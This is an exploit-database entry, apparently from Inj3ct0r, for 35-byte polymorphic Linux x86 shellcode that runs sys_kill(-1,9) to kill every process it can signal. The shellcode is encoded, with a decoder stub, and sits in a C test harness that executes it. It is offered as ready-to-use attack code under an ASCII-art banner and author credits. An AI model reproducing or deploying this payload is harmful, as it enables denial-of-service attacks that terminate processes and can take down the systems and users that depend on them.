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linux/x86 killall running process polymorphic shellcode 35 bytes

🗓️ 17 Jun 2010 00:00:00Reported by gunslinger_Type 
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linux/x86 killall shellcode 35 byte

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linux/x86 killall running process polymorphic shellcode 35 bytes
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/*
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
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Title  : killall running process x86 linux polymorphic shellcode
Name   : 35 bytes sys_kill(-1,9) x86 linux polymorphic shellcode
Date   : Thursday Jun  17 23:17:00 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : http://devilzc0de.org
blog   : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (exploit-db.com)
*/

#include <stdio.h>

char killme[] =  "\xeb\x11\x5e\x31\xc9\xb1\x0b\x80\x6c\x0e\xff\x35\x80\xe9\x01"
		 "\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x66\xf5\xe5\x5a\x9f\x34"
		 "\x90\xe6\x3e\x02\xb5";
		
int main(int argc, char **argv)
{
	fprintf(stdout,"Length: %d\n",strlen(killme));
  	int (*func)();
  	func = (int (*)()) killme;
  	(int)(*func)();
}



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